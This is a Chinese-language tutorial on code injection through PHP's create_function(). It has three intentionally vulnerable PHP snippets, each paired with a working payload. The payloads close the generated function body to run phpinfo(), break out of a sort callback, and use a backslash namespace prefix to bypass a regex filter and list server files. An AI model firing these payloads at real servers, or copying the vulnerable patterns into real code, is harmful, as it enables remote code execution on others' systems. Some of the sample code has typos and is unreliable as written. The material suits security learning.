0x00 create_function()介绍
create_function()创建匿名函数
string create_function ( string $args , string $code )
string
code 方法代码部分
举例:
create_function('$name','echo $name."A"')
类似于:
function name($name) {
echo $name."A";
}
0x01 漏洞利用
1
//02-8.php?id=2;}phpinfo();/*
$id=$_GET['id'];
$str2='echo '.$a.'test'.$id.";";
echo $str2;
echo "
";
echo "==============================";
echo "
";
$f1 = create_function('$a',$str2);
echo "
";
echo "==============================";
?>
payload:
http://localhost/libtest/02-8.php?id=2;}phpinfo();/*
原理:
id=2;}phpinfo();/*
执行函数为:
源代码:
function fT($a) {
echo "test".$a;
}
注入后代码:
function fT($a) {
echo "test";}
phpinfo();/*;//此处为注入代码。
}
2
//how to exp this code
$sort_by=$_GET['sort_by'];
$sorter='strnatcasecmp';
$databases=array('test','test');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>
payload:
func.php?sort_by="]);}phpinfo();/*
3
error_reporting(0);
if(isset($_GET['action'])){
$action=$_GET['action'];
}
if(isset($_GET['action'])){
$arg=$_GET['arg'];
}
if(preg_match('/^[a-z0-9_]*$/isD',$action)){
show_sourse(_FILE_);
}else{
$action($arg,'');
}
?>
正则绕过,数字字母下划线都被禁止.
思路就是在开头或结尾插入字符绕过检测,涉及到php全局命名空间:在函数的头部加上 \就是调用全局的此函数,即\create_function()就是调用全局的create_function()函数,同时函数头部加上\可绕过正则过滤,\即%5c.
漏洞利用处
arg,'');,也就是说如果利用create_function()函数漏洞,这里是参数为GET值,执行代码为空
payload:
ip/?action=%5ccreate_function&arg=){}var_dump(scandir("./"));/*